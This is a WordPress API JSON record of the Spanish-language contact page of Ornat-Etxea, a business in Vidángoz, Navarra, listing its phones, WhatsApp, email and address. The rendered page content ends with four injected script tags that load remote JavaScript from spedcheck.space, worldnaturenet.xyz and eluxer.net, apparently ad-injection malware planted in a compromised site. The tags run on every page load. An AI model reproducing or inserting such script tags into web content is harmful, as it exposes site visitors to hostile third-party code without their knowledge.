{"id":27,"date":"2018-04-11T09:51:07","date_gmt":"2018-04-11T09:51:07","guid":{"rendered":"http:\/\/ornat-etxea.com\/?page_id=27"},"modified":"2026-01-28T17:34:17","modified_gmt":"2026-01-28T17:34:17","slug":"contacto","status":"publish","type":"page","link":"https:\/\/ornat-etxea.com\/index.php\/contacto\/","title":{"rendered":"Contacto"},"content":{"rendered":"<p>Puedes contactar con Ornat-Etxea de las siguientes maneras:<\/p>\n<p><strong>Tel\u00e9fono<\/strong><br \/>\n<a href=\"tel:+34627991896\">627991896<\/a> &#8211; <a href=\"tel:+34948477179\">948477179<\/a><\/p>\n<p><strong>Whatsapp<\/strong><br \/>\n<a href=\"https:\/\/api.whatsapp.com\/send?phone=34627991896\">627991896<\/a><\/p>\n<p><a href=\"mailto:ornatetxea@gmail.com\"><strong>Email<\/strong><br \/>\nornatetxea@gmail.com<\/a><\/p>\n<p><strong>Direcci\u00f3n<\/strong><br \/>\nCalle Ecuador 5<br \/>\n31413 Vid\u00e1ngoz\/Bidankoze (Navarra\/Nafarroa)<\/p>\n<p><script src=\"http:\/\/spedcheck.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52189x6678x&amp;r=19\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spedcheck.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=52189_6678_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Puedes contactar con Ornat-Etxea de las siguientes maneras: Tel\u00e9fono 627991896 &#8211; 948477179 Whatsapp 627991896 Email ornatetxea@gmail.com Direcci\u00f3n Calle Ecuador 5 31413 Vid\u00e1ngoz\/Bidankoze (Navarra\/Nafarroa)<\/p>\n","protected":false},"author":1,"featured_media":22,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/27"}],"collection":[{"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/comments?post=27"}],"version-history":[{"count":5,"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/27\/revisions"}],"predecessor-version":[{"id":5145,"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/27\/revisions\/5145"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/media\/22"}],"wp:attachment":[{"href":"https:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/media?parent=27"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}